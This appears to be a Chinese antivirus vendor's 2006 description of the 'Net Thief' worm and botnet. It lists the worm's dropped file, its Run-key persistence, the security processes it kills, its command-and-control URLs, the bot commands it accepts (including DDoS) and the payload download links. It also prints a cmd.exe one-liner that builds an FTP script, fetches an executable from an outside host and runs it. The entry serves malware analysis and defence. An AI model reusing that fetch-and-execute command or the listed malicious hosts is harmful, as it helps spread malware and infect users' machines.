病毒别名：处理时间：2006-08-29威胁级别：★
中文名称：网贼病毒类型：蠕虫影响系统：win9x/me,win2000/nt,winxp,win2003
病毒行为:
这是一个通过网络传播的蠕虫病毒,该病毒会尝试自更新,并且开启后门接受控制端的控制,结束安全软件,使被感染的机器成为一台网络僵尸.

1.生成文件:
%system%\mmsvc32.exe

2.添加起始项,使病毒开机启动:
hkcu\software\microsoft\windows\currentversion\run
microsoftnetworkservicescontroller
mmsvc32.exe
hklm\software\microsoft\windows\currentversion\run
microsoftnetworkservicescontroller
mmsvc32.exe
3.查找并且关闭以下窗口进程,并且自己注册一个该窗口使其无法开启
dbmwin
tdbmwin

4.删除以下键:
hkcu\software\microsoft\windows\currentversion\run
microsoftiis
hkcu\software\microsoft\windows\currentversion\run
paytime
hkcu\software\microsoft\windows\currentversion\run
lp3mr1sh

5.创建线程运行以下的命令:
cmd.exe/cechousernnpy@web.cplnn.com>ntsdd.txt
&&echof729lqjd>>ntsdd.txt
&&echobinary>>ntsdd.txt
&&echogetmmf32.exe>>ntsdd.txt
&&echoquit>>ntsdd.txt
&&ftp-s:ntsdd.txt-n-nnpyf.cplnn.com
&&delntsdd.txt
&&mmf32.exe

6.运行以下命令,结束安全软件进程:
!proc.kill.*ftp.exe
!proc.kill.*tftp.exe
!proc.kill.*nh.exe
!proc.kill.*nethost.exe
!proc.kill.*syshost.exe
!proc.kill.*ppc.exe
!proc.kill.*paytime.exe
!proc.kill.*lp3mr1sh.exe
!proc.kill.*tibs.exe
!proc.kill.*opera.exe
!proc.kill.*netscape.exe


7.尝试连接以下地址:

http://nnpy.cplnn.com/lipscr2.php
http://dnsf.nnctx.com.ru/ipconf.cfg
http://nnpyev.nnctx.com.ru/wad/nnpy.txt
http://www.ppwex.com/sdata.txt
http://wlog.cplnn.com/wlog.php?action=knock
8.能接收的命令如下:
!http.dos
!udp.ddos
!proc.kill
!run
!url.download
!update
!aftp.config
!url.spoof
!ie.counter


9.尝试下载以下文件:
http://web.cplnn.com/bbot.exe
http://web.cplnn.com/psvc.exe
http://web.cplnn.com/psvc.exe
http://www.gmz41-soft.com/vxupd.exe